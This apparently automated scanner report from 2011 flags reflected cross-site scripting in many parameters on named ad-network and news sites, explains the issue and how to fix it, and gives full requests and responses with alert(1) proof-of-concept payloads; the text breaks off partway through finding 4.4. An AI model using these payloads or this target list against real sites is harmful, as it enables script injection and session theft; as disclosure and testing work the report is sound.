http://api.zap2it.com/tvlistings/zcConnector.jsp [name of an arbitrarily supplied request parameter]
http://api.zap2it.com/tvlistings/zcConnector.jsp [stnlt parameter]
http://api.zap2it.com/tvlistings/zcConnector.jsp [v parameter]
http://api.zap2it.com/tvlistings/zcConnector.jsp [zip parameter]
http://b.scorecardresearch.com/beacon.js [c1 parameter]
http://b.scorecardresearch.com/beacon.js [c10 parameter]
http://b.scorecardresearch.com/beacon.js [c15 parameter]
http://b.scorecardresearch.com/beacon.js [c2 parameter]
http://b.scorecardresearch.com/beacon.js [c3 parameter]
http://b.scorecardresearch.com/beacon.js [c4 parameter]
http://b.scorecardresearch.com/beacon.js [c5 parameter]
http://b.scorecardresearch.com/beacon.js [c6 parameter]
http://c.aol.com/read/_topic_stats [callback parameter]
http://choices.truste.com/ca [c parameter]
http://choices.truste.com/ca [cid parameter]
http://choices.truste.com/ca [plc parameter]
http://cm.npc-hearst.overture.com/js_1_0/ [css_url parameter]
http://ellegirl.elle.com/ [name of an arbitrarily supplied request parameter]
http://ellegirl.elle.com/wp-content/plugins/jquery-lightbox-balupton-edition/scripts/jquery.lightbox.min.js [REST URL parameter 1]
http://ellegirl.elle.com/wp-content/plugins/jquery-lightbox-balupton-edition/scripts/jquery.lightbox.min.js [REST URL parameter 2]
http://ellegirl.elle.com/wp-content/plugins/jquery-lightbox-balupton-edition/scripts/jquery.lightbox.min.js [REST URL parameter 3]
http://ellegirl.elle.com/wp-content/plugins/jquery-lightbox-balupton-edition/scripts/jquery.lightbox.min.js [REST URL parameter 4]
http://ellegirl.elle.com/wp-content/plugins/jquery-lightbox-balupton-edition/scripts/jquery.lightbox.min.js [REST URL parameter 5]
http://ellegirl.elle.com/wp-content/plugins/jquery-lightbox-balupton-edition/scripts/jquery.lightbox.plugin.min.js [REST URL parameter 1]
http://ellegirl.elle.com/wp-content/plugins/jquery-lightbox-balupton-edition/scripts/jquery.lightbox.plugin.min.js [REST URL parameter 2]
http://ellegirl.elle.com/wp-content/plugins/jquery-lightbox-balupton-edition/scripts/jquery.lightbox.plugin.min.js [REST URL parameter 3]
http://ellegirl.elle.com/wp-content/plugins/jquery-lightbox-balupton-edition/scripts/jquery.lightbox.plugin.min.js [REST URL parameter 4]
http://ellegirl.elle.com/wp-content/plugins/jquery-lightbox-balupton-edition/scripts/jquery.lightbox.plugin.min.js [REST URL parameter 5]
http://ellegirl.elle.com/wp-content/plugins/slideshow-gallery-2/css/gallery-css.php [REST URL parameter 1]
http://ellegirl.elle.com/wp-content/plugins/slideshow-gallery-2/css/gallery-css.php [REST URL parameter 2]
http://ellegirl.elle.com/wp-content/plugins/slideshow-gallery-2/css/gallery-css.php [REST URL parameter 3]
http://ellegirl.elle.com/wp-content/plugins/slideshow-gallery-2/css/gallery-css.php [REST URL parameter 4]
http://ellegirl.elle.com/wp-content/plugins/slideshow-gallery-2/css/gallery-css.php [REST URL parameter 5]
http://ellegirl.elle.com/wp-content/plugins/slideshow-gallery-2/css/gallery-css.php [background parameter]
http://ellegirl.elle.com/wp-content/plugins/slideshow-gallery-2/css/gallery-css.php [border parameter]
http://ellegirl.elle.com/wp-content/plugins/slideshow-gallery-2/css/gallery-css.php [height parameter]
http://ellegirl.elle.com/wp-content/plugins/slideshow-gallery-2/css/gallery-css.php [infobackground parameter]
http://ellegirl.elle.com/wp-content/plugins/slideshow-gallery-2/css/gallery-css.php [infocolor parameter]
http://ellegirl.elle.com/wp-content/plugins/slideshow-gallery-2/js/gallery.js [REST URL parameter 1]
http://ellegirl.elle.com/wp-content/plugins/slideshow-gallery-2/js/gallery.js [REST URL parameter 2]
http://ellegirl.elle.com/wp-content/plugins/slideshow-gallery-2/js/gallery.js [REST URL parameter 3]
http://ellegirl.elle.com/wp-content/plugins/slideshow-gallery-2/js/gallery.js [REST URL parameter 4]
http://ellegirl.elle.com/wp-content/plugins/slideshow-gallery-2/js/gallery.js [REST URL parameter 5]
http://ellegirl.elle.com/wp-content/plugins/wp-pagenavi/pagenavi-css.css [REST URL parameter 1]
http://ellegirl.elle.com/wp-content/plugins/wp-pagenavi/pagenavi-css.css [REST URL parameter 2]
http://ellegirl.elle.com/wp-content/plugins/wp-pagenavi/pagenavi-css.css [REST URL parameter 3]
http://ellegirl.elle.com/wp-content/plugins/wp-pagenavi/pagenavi-css.css [REST URL parameter 4]
http://ellegirl.elle.com/wp-content/themes/thesis/custom/custom.css [REST URL parameter 1]
http://ellegirl.elle.com/wp-content/themes/thesis/custom/custom.css [REST URL parameter 2]
http://ellegirl.elle.com/wp-content/themes/thesis/custom/custom.css [REST URL parameter 3]
http://ellegirl.elle.com/wp-content/themes/thesis/custom/custom.css [REST URL parameter 4]
http://ellegirl.elle.com/wp-content/themes/thesis/custom/custom.css [REST URL parameter 5]
http://ellegirl.elle.com/wp-content/themes/thesis/custom/images/favicon.ico [REST URL parameter 1]
http://ellegirl.elle.com/wp-content/themes/thesis/custom/images/favicon.ico [REST URL parameter 2]
http://ellegirl.elle.com/wp-content/themes/thesis/custom/images/favicon.ico [REST URL parameter 3]
http://ellegirl.elle.com/wp-content/themes/thesis/custom/images/favicon.ico [REST URL parameter 4]
http://ellegirl.elle.com/wp-content/themes/thesis/custom/images/favicon.ico [REST URL parameter 5]
http://ellegirl.elle.com/wp-content/themes/thesis/custom/images/favicon.ico [REST URL parameter 6]
http://ellegirl.elle.com/wp-content/themes/thesis/custom/js/custom.js [REST URL parameter 1]
http://ellegirl.elle.com/wp-content/themes/thesis/custom/js/custom.js [REST URL parameter 2]
http://ellegirl.elle.com/wp-content/themes/thesis/custom/js/custom.js [REST URL parameter 3]
http://ellegirl.elle.com/wp-content/themes/thesis/custom/js/custom.js [REST URL parameter 4]
http://ellegirl.elle.com/wp-content/themes/thesis/custom/js/custom.js [REST URL parameter 5]
http://ellegirl.elle.com/wp-content/themes/thesis/custom/js/custom.js [REST URL parameter 6]
http://ellegirl.elle.com/wp-content/themes/thesis/custom/js/jquery.cycle.all.min.js [REST URL parameter 1]
http://ellegirl.elle.com/wp-content/themes/thesis/custom/js/jquery.cycle.all.min.js [REST URL parameter 2]
http://ellegirl.elle.com/wp-content/themes/thesis/custom/js/jquery.cycle.all.min.js [REST URL parameter 3]
http://ellegirl.elle.com/wp-content/themes/thesis/custom/js/jquery.cycle.all.min.js [REST URL parameter 4]
http://ellegirl.elle.com/wp-content/themes/thesis/custom/js/jquery.cycle.all.min.js [REST URL parameter 5]
http://ellegirl.elle.com/wp-content/themes/thesis/custom/js/jquery.cycle.all.min.js [REST URL parameter 6]
http://ellegirl.elle.com/wp-content/themes/thesis/custom/layout.css [REST URL parameter 1]
http://ellegirl.elle.com/wp-content/themes/thesis/custom/layout.css [REST URL parameter 2]
http://ellegirl.elle.com/wp-content/themes/thesis/custom/layout.css [REST URL parameter 3]
http://ellegirl.elle.com/wp-content/themes/thesis/custom/layout.css [REST URL parameter 4]
http://ellegirl.elle.com/wp-content/themes/thesis/custom/layout.css [REST URL parameter 5]
http://ellegirl.elle.com/wp-content/themes/thesis/style.css [REST URL parameter 1]
http://ellegirl.elle.com/wp-content/themes/thesis/style.css [REST URL parameter 2]
http://ellegirl.elle.com/wp-content/themes/thesis/style.css [REST URL parameter 3]
http://ellegirl.elle.com/wp-content/themes/thesis/style.css [REST URL parameter 4]
http://ellegirl.elle.com/wp-includes/js/jquery/jquery.js [REST URL parameter 1]
http://ellegirl.elle.com/wp-includes/js/jquery/jquery.js [REST URL parameter 2]
http://ellegirl.elle.com/wp-includes/js/jquery/jquery.js [REST URL parameter 3]
http://ellegirl.elle.com/wp-includes/js/jquery/jquery.js [REST URL parameter 4]
http://event.adxpose.com/event.flow [uid parameter]
http://events.seattlepi.com/partner_json/search [image_size parameter]
http://events.seattlepi.com/partner_json/search [jsonsp parameter]
http://events.seattlepi.com/partner_json/search [st parameter]
http://events.stamfordadvocate.com/partner_json/search [image_size parameter]
http://events.stamfordadvocate.com/partner_json/search [jsonsp parameter]
http://events.stamfordadvocate.com/partner_json/search [st parameter]
http://js.revsci.net/gateway/gw.js [csid parameter]
http://mpd.mxptint.net/1/S74.API/G1/T124/js [mid parameter]
http://nai.ad.us-ec.adtechus.com/nai/daa.php [REST URL parameter 1]
http://nai.ad.us-ec.adtechus.com/nai/daa.php [REST URL parameter 1]
http://nai.ad.us-ec.adtechus.com/nai/daa.php [REST URL parameter 2]
http://nai.ad.us-ec.adtechus.com/nai/daa.php [REST URL parameter 2]
http://nai.adserver.adtechus.com/nai/daa.php [REST URL parameter 1]
http://nai.adserver.adtechus.com/nai/daa.php [REST URL parameter 1]
http://nai.adserver.adtechus.com/nai/daa.php [REST URL parameter 2]
http://nai.adserver.adtechus.com/nai/daa.php [REST URL parameter 2]
http://nai.adserverec.adtechus.com/nai/daa.php [REST URL parameter 1]
http://nai.adserverec.adtechus.com/nai/daa.php [REST URL parameter 1]
http://nai.adserverec.adtechus.com/nai/daa.php [REST URL parameter 2]
http://nai.adserverec.adtechus.com/nai/daa.php [REST URL parameter 2]
http://nai.adserverwc.adtechus.com/nai/daa.php [REST URL parameter 1]
http://nai.adserverwc.adtechus.com/nai/daa.php [REST URL parameter 1]
http://nai.adserverwc.adtechus.com/nai/daa.php [REST URL parameter 2]
http://nai.adserverwc.adtechus.com/nai/daa.php [REST URL parameter 2]
http://nai.adsonar.com/nai/daa.php [REST URL parameter 1]
http://nai.adsonar.com/nai/daa.php [REST URL parameter 1]
http://nai.adsonar.com/nai/daa.php [REST URL parameter 2]
http://nai.adsonar.com/nai/daa.php [REST URL parameter 2]
http://nai.adtech.de/nai/daa.php [REST URL parameter 1]
http://nai.adtech.de/nai/daa.php [REST URL parameter 1]
http://nai.adtech.de/nai/daa.php [REST URL parameter 2]
http://nai.adtech.de/nai/daa.php [REST URL parameter 2]
http://nai.advertising.com/nai/daa.php [REST URL parameter 1]
http://nai.advertising.com/nai/daa.php [REST URL parameter 1]
http://nai.advertising.com/nai/daa.php [REST URL parameter 2]
http://nai.advertising.com/nai/daa.php [REST URL parameter 2]
http://nai.glb.adtechus.com/modules/book/book.css [REST URL parameter 1]
http://nai.glb.adtechus.com/modules/book/book.css [REST URL parameter 1]
http://nai.glb.adtechus.com/modules/book/book.css [REST URL parameter 2]
http://nai.glb.adtechus.com/modules/book/book.css [REST URL parameter 2]
http://nai.glb.adtechus.com/modules/book/book.css [REST URL parameter 3]
http://nai.glb.adtechus.com/modules/book/book.css [REST URL parameter 3]
http://nai.glb.adtechus.com/modules/node/node.css [REST URL parameter 1]
http://nai.glb.adtechus.com/modules/node/node.css [REST URL parameter 1]
http://nai.glb.adtechus.com/modules/node/node.css [REST URL parameter 2]
http://nai.glb.adtechus.com/modules/node/node.css [REST URL parameter 2]
http://nai.glb.adtechus.com/modules/system/defaults.css [REST URL parameter 1]
http://nai.glb.adtechus.com/modules/system/defaults.css [REST URL parameter 1]
http://nai.glb.adtechus.com/modules/system/defaults.css [REST URL parameter 2]
http://nai.glb.adtechus.com/modules/system/defaults.css [REST URL parameter 2]
http://nai.glb.adtechus.com/modules/system/system-menus.css [REST URL parameter 1]
http://nai.glb.adtechus.com/modules/system/system-menus.css [REST URL parameter 1]
http://nai.glb.adtechus.com/modules/system/system-menus.css [REST URL parameter 2]
http://nai.glb.adtechus.com/modules/system/system-menus.css [REST URL parameter 2]
http://nai.glb.adtechus.com/modules/system/system.css [REST URL parameter 1]
http://nai.glb.adtechus.com/modules/system/system.css [REST URL parameter 1]
http://nai.glb.adtechus.com/modules/system/system.css [REST URL parameter 2]
http://nai.glb.adtechus.com/modules/system/system.css [REST URL parameter 2]
http://nai.glb.adtechus.com/modules/user/user.css [REST URL parameter 1]
http://nai.glb.adtechus.com/modules/user/user.css [REST URL parameter 1]
http://nai.glb.adtechus.com/modules/user/user.css [REST URL parameter 2]
http://nai.glb.adtechus.com/modules/user/user.css [REST URL parameter 2]
http://nai.glb.adtechus.com/nai/daa.php [REST URL parameter 1]
http://nai.glb.adtechus.com/nai/daa.php [REST URL parameter 1]
http://nai.glb.adtechus.com/nai/daa.php [REST URL parameter 2]
http://nai.glb.adtechus.com/nai/daa.php [REST URL parameter 2]
http://nai.glb.adtechus.com/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 1]
http://nai.glb.adtechus.com/sites/all/modules/cck/modules/fieldgroup/fieldgroup.css [REST URL parameter 1]
http://nai.glb.adtechus.com/sites/all/modules/cck/theme/content-module.css [REST URL parameter 1]
http://nai.glb.adtechus.com/sites/all/modules/cck/theme/content-module.css [REST URL parameter 1]
http://nai.glb.adtechus.com/sites/all/modules/cck/theme/content-module.css [REST URL parameter 2]
http://nai.glb.adtechus.com/sites/all/modules/cck/theme/content-module.css [REST URL parameter 2]
http://nai.glb.adtechus.com/sites/all/modules/filefield/filefield.css [REST URL parameter 1]
http://nai.glb.adtechus.com/sites/all/modules/filefield/filefield.css [REST URL parameter 1]
http://nai.glb.adtechus.com/sites/all/modules/filefield/filefield.css [REST URL parameter 2]
http://nai.glb.adtechus.com/sites/all/modules/filefield/filefield.css [REST URL parameter 2]
http://nai.glb.adtechus.com/sites/all/modules/pollfield/pollfield.css [REST URL parameter 1]
http://nai.glb.adtechus.com/sites/all/modules/pollfield/pollfield.css [REST URL parameter 1]
http://nai.glb.adtechus.com/sites/all/modules/views/css/views.css [REST URL parameter 1]
http://nai.glb.adtechus.com/sites/all/modules/views/css/views.css [REST URL parameter 1]
http://nai.glb.adtechus.com/sites/all/modules/views_slideshow/contrib/views_slideshow_singleframe/views_slideshow.css [REST URL parameter 1]
http://nai.glb.adtechus.com/sites/all/modules/views_slideshow/contrib/views_slideshow_singleframe/views_slideshow.css [REST URL parameter 1]
http://nai.glb.adtechus.com/sites/all/themes/zen/aolad/css/screen.css [REST URL parameter 1]
http://nai.glb.adtechus.com/sites/all/themes/zen/aolad/css/screen.css [REST URL parameter 1]
http://nai.glb.adtechus.com/sites/all/themes/zen/aolad/css/screen.css [REST URL parameter 2]
http://nai.glb.adtechus.com/sites/all/themes/zen/aolad/css/screen.css [REST URL parameter 2]
http://nai.glb.adtechus.com/sites/all/themes/zen/aolad/css/screen.css [REST URL parameter 3]
http://nai.glb.adtechus.com/sites/all/themes/zen/aolad/css/screen.css [REST URL parameter 3]
http://nai.glb.adtechus.com/sites/all/themes/zen/zen/html-elements.css [REST URL parameter 1]
http://nai.glb.adtechus.com/sites/all/themes/zen/zen/html-elements.css [REST URL parameter 1]
http://nai.glb.adtechus.com/sites/all/themes/zen/zen/tabs.css [REST URL parameter 1]
http://nai.glb.adtechus.com/sites/all/themes/zen/zen/tabs.css [REST URL parameter 1]
http://nai.tacoda.at.atwola.com/nai/daa.php [REST URL parameter 1]
http://nai.tacoda.at.atwola.com/nai/daa.php [REST URL parameter 1]
http://nai.tacoda.at.atwola.com/nai/daa.php [REST URL parameter 2]
http://nai.tacoda.at.atwola.com/nai/daa.php [REST URL parameter 2]
http://pixel.adsafeprotected.com/jspix [anId parameter]
http://pixel.adsafeprotected.com/jspix [campId parameter]
http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter]
http://pixel.adsafeprotected.com/jspix [pubId parameter]
http://r.skimresources.com/api/ [callback parameter]
http://sb1.analoganalytics.com/publishers/hearst-seattlepi/deal-of-the-day.json [callback parameter]
http://servedby.flashtalking.com/imp/3/17799 [189583;201;js;MaxPoint;MaxPointW2554DallasFtWorth911924300x250FTPB/?click parameter]
http://servedby.flashtalking.com/imp/3/17799 [cachebuster parameter]
http://servedby.flashtalking.com/imp/3/17799 [ftadz parameter]
http://servedby.flashtalking.com/imp/3/17799 [ftscw parameter]
http://servedby.flashtalking.com/imp/3/17799 [ftx parameter]
http://servedby.flashtalking.com/imp/3/17799 [fty parameter]
http://servedby.flashtalking.com/imp/3/17799 [name of an arbitrarily supplied request parameter]
http://studio-5.financialcontent.com/hearst [Account parameter]
http://studio-5.financialcontent.com/hearst [Module parameter]
http://studio-5.financialcontent.com/hearst [REST URL parameter 1]
http://studio-5.financialcontent.com/hearst [name of an arbitrarily supplied request parameter]
http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]
http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]
http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]
http://tag.contextweb.com/TagPublish/getjs.aspx [cwpid parameter]
http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]
http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]
http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]
http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]
http://www.addthis.com/api/nai/optout [REST URL parameter 1]
http://www.addthis.com/api/nai/optout [REST URL parameter 1]
http://www.addthis.com/api/nai/optout [REST URL parameter 2]
http://www.addthis.com/api/nai/optout [REST URL parameter 2]
http://www.addthis.com/api/nai/optout [REST URL parameter 3]
http://www.addthis.com/api/nai/optout [REST URL parameter 3]
http://www.addthis.com/api/nai/status [REST URL parameter 1]
http://www.addthis.com/api/nai/status [REST URL parameter 1]
http://www.addthis.com/api/nai/status [REST URL parameter 2]
http://www.addthis.com/api/nai/status [REST URL parameter 2]
http://www.addthis.com/api/nai/status [REST URL parameter 3]
http://www.addthis.com/api/nai/status [REST URL parameter 3]
http://www.answerology.com/index.aspx [topic parameter]
http://www.answerology.com/index.aspx [topic parameter]
http://www.chron.com/apps/adWiz/adWiz.mpl [url parameter]
http://www.gather.com/426d8%3Cimg+src=a+onerror=alert(%22XSS%22)%3E31b7c6065d67ada9d [REST URL parameter 1]
http://www.gather.com/426d8%3Cimg+src=a+onerror=alert(%22XSS%22)%3E31b7c6065d67ada9d [REST URL parameter 1]
http://www.gather.com/426d8%3Cimg+src=a+onerror=alert(%22XSS%22)%3E31b7c6065d67ada9d [REST URL parameter 1]
http://www.gather.com/URI+SYNTAX+EXCEPTION [REST URL parameter 1]
http://www.gather.com/URI+SYNTAX+EXCEPTION [REST URL parameter 1]
http://www.gather.com/a [REST URL parameter 1]
http://www.gather.com/a [REST URL parameter 1]
http://www.gather.com/favicon.ico [REST URL parameter 1]
http://www.gather.com/favicon.ico [REST URL parameter 1]
http://www.gather.com/global_andre.css [REST URL parameter 1]
http://www.gather.com/global_andre.css [REST URL parameter 1]
http://www.gather.com/peopleAreTalking.action [REST URL parameter 1]
http://www.gather.com/peopleAreTalking.action [REST URL parameter 1]
http://www.kampyle.com/feedback_form/ff-feedback-form.php [amp;form_id parameter]
http://www.kampyle.com/feedback_form/ff-feedback-form.php [amp;lang parameter]
http://www.kampyle.com/feedback_form/ff-feedback-form.php [name of an arbitrarily supplied request parameter]
http://www.kampyle.com/feedback_form/ff-feedback-form.php [stats parameter]
http://www.kampyle.com/feedback_form/ff-feedback-form.php [time_on_site parameter]
http://www.kampyle.com/feedback_form/ff-feedback-form.php [time_on_site parameter]
http://www.kampyle.com/feedback_form/ff-feedback-form.php [url parameter]
http://www.kampyle.com/feedback_form/ff-feedback-form.php [utma parameter]
http://www.kampyle.com/feedback_form/ff-feedback-form.php [utmv parameter]
http://www.kampyle.com/feedback_form/ff-feedback-form.php [utmz parameter]
http://www.local.com/dart/ [css parameter]
http://www.local.com/dart/ [kw parameter]
http://www.local.com/dart/ [kw parameter]
http://www.local.com/dart/ [l parameter]
http://www.local.com/dart/ [l parameter]
http://www.local.com/dart/ [ord parameter]
http://www.local.com/dart/ [ord parameter]
http://www.local.com/dart/ [p parameter]
http://www.local.com/dart/ [p parameter]
http://www.local.com/dart/ [sz parameter]
http://www.local.com/dart/ [sz parameter]
http://www.local.com/dart/ [zip parameter]
http://www.networkadvertising.org/managing/optout_results.asp [yahoo_token parameter]
http://www.stamfordadvocatedailydeals.com/widgets/widget [REST URL parameter 2]
http://adnxs.revsci.net/imp [Referer HTTP header]
http://pixel.adsafeprotected.com/jspix [Referer HTTP header]
http://advertising.aol.com/nai/nai.php [token_nai_ad_us-ec_adtechus_com cookie]
http://advertising.aol.com/nai/nai.php [token_nai_adserver_adtechus_com cookie]
http://advertising.aol.com/nai/nai.php [token_nai_adserverec_adtechus_com cookie]
http://advertising.aol.com/nai/nai.php [token_nai_adserverwc_adtechus_com cookie]
http://advertising.aol.com/nai/nai.php [token_nai_adsonar_com cookie]
http://advertising.aol.com/nai/nai.php [token_nai_adtech_de cookie]
http://advertising.aol.com/nai/nai.php [token_nai_advertising_com cookie]
http://advertising.aol.com/nai/nai.php [token_nai_glb_adtechus_com cookie]
http://advertising.aol.com/nai/nai.php [token_nai_tacoda_at_atwola_com cookie]
http://contextweb.pixel.invitemedia.com/context_sync [uid cookie]
http://r.skimresources.com/api/ [skimGUID cookie]

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

4.1. http://a.collective-media.net/adj/bzo.454.61DCBAA1/_default [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/bzo.454.61DCBAA1/_default

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2fa62'-alert(1)-'8c692c22431 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/bzo.454.61DCBAA12fa62'-alert(1)-'8c692c22431/_default;sz=728x90;ord=1316294704606? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 462
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:25:36 GMT
Connection: close
Set-Cookie: dc=sea-dc%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 16:25:36 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/bzo.454.61DCBAA12fa62'-alert(1)-'8c692c22431/_default;sz=728x90;net=bzo;ord=1316294704606;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.2. http://a.collective-media.net/adj/bzo.454.61DCBAA1/_default [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/bzo.454.61DCBAA1/_default

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0581'-alert(1)-'e88ada4a155 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/bzo.454.61DCBAA1/_defaultb0581'-alert(1)-'e88ada4a155;sz=728x90;ord=1316294704606? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 462
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:25:37 GMT
Connection: close
Set-Cookie: dc=sea-dc%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 16:25:37 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/bzo.454.61DCBAA1/_defaultb0581'-alert(1)-'e88ada4a155;sz=728x90;net=bzo;ord=1316294704606;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.3. http://a.collective-media.net/adj/bzo.454.61DCBAA1/_default [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/bzo.454.61DCBAA1/_default

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61ae5'-alert(1)-'40561ccbb3f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/bzo.454.61DCBAA1/_default;sz=728x90;ord=1316294704606?&61ae5'-alert(1)-'40561ccbb3f=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.seattlepi.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optout=1; dc=sea-dc

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 466
Vary: Accept-Encoding
Date: Sat, 17 Sep 2011 16:25:34 GMT
Connection: close
Set-Cookie: dc=sea-dc%5D%5D%3E%3E; domain=collective-media.net; path=/; expires=Mon, 17-Oct-2011 16:25:34 GMT
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

var cmPageURL; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var cmifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt type="text/javascript" language="javascript" src="http://a.collective-media.net/cmadj/bzo.454.61DCBAA1/_default;sz=728x90;net=bzo;ord=1316294704606?&61ae5'-alert(1)-'40561ccbb3f=1;'+cmifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.4. http://a.collective-media.net/adj/bzo.454.61DCBAA1/_default [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://a.collective-media.net
Path:	/adj/bzo.454.61DCBAA1/_default

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f443e'-alert(1)-'c92a6f31e27 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

